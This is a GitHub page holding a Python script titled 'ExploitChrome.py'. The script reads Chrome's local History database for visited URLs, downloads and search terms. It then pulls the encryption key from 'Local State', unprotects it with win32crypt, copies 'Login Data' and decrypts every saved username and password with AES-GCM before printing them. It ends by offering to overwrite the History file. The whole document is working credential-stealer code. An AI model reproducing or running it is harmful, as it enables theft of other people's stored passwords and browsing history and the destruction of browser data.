-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathExploitChrome.py
More file actions
190 lines (130 loc) · 3.99 KB
/
Copy pathExploitChrome.py
File metadata and controls
190 lines (130 loc) · 3.99 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
# Importing Library For Get And Decode Exploit
import sqlite3, os, getpass, sys
# Show Info Tools And Find Exploit Path And Print
print(f"""
___
// \\
|| E ||
\\___//
Chrome Exploit
Exploit Get History
Exploted By @BLACK_NICOLA
Exploit_Path : C:\\Users\\{getpass.getuser()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default
[VIP] Your Can Delete Exploit Of Your System
================================================
""")
# Check Type System
if os.name == 'nt':
# Find Exploit Paths
home_exploit = (f"C:\\Users\\{getpass.getuser()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default")
path_exploit = (f"C:\\Users\\{getpass.getuser()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History")
# Check For Install Chrome
try:
os.chdir(home_exploit)
except:
print("Please Install Chrome!")
sys.exit()
else:
home_exploit = (f"/home/{getpass.getuser()}/.config/google-chrome/Default")
path_exploit = (f"/home/{getpass.getuser()}/.config/google-chrome/Default/History")
try:
os.chdir(home_exploit)
except:
print("Please Install Chrome!")
sys.exit()
# Connect And Get Exploit
try:
db = sqlite3.connect(path_exploit)
except:
print("Please Close Chrome And Open Tools Now.")
sys.exit()
c = db.cursor()
# Decode SEARCH FRom Exploit
searchs = []
# Check For Find Exploit
try:
c.execute("select term from keyword_search_terms")
except:
print("Exploit Deleted!")
sys.exit()
for item in c.fetchall():
searchs.append(item[0])
# Decode URL FRom Exploit
urls = []
c.execute("select url from urls")
for item in c.fetchall():
urls.append(item[0])
# Decode Download FRom Exploit
downloads = []
c.execute("select tab_url from downloads")
for item in c.fetchall():
downloads.append(item[0])
## SHOW Information ##
print("Urls : ")
for url in urls:
print("\t{}".format(url))
print("-"*50)
print("Downloaded Files :")
for download in downloads:
print("\t{}".format(download))
print("-"*50)
print("Searchs : ")
for search in searchs:
print("\t{}".format(search))
try:
import json
from base64 import b64decode
try:
import win32crypt
except:
print("Please Install win32crypt With ~pip install win32crypt~")
import sqlite3
import shutil
try:
from Crypto.Cipher import AES
except:
print("Please InstallCrypto With ~pip install Crypto~")
f = open(f"C:\\Users\\{getpass.getuser()}\\AppData\\Local\\Google\\Chrome\\User Data\\Local State")
local_state = json.loads(f.read())
key = local_state["os_crypt"]["encrypted_key"]
# 1
key = b64decode(key) # Base 64 Decoder
key = key[5:]
# 2
key = win32crypt.CryptUnprotectData(key)[1]
###########################################
path = (f"C:\\Users\\{getpass.getuser()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\")
shutil.copy(path+"Login Data" , path+"database2") # Copy Database
database = sqlite3.connect(path+"database2")
cursor = database.cursor()
cursor.execute("select origin_url , username_value , password_value from logins")
result = cursor.fetchall()
def decrypt(password , key):
iv = password[3:15]
password = password[15:]
cipher = AES.new(key , AES.MODE_GCM , iv)
password = cipher.decrypt(password)
password = password[:-16].decode()
return password
for i in result:
url = i[0]
username = i[1]
password = decrypt(i[2] , key)
print("{} : ".format(url))
print("\tusername : {}".format(username))
print("\tpassword : {}".format(password))
print()
except:
pass
# DElete Exploit
se = str(input("[VIP] Do You Want Delete It Exploit On Your System ? ( [Y]es/[N]o ): ")).lower()
if "y" in se:
# Try For Delete Exploit
try:
open(path_exploit, "w+")
print("[VIP] Deleted!")
except:
print("Error")
input("""
Enter For Close... """)
sys.exit()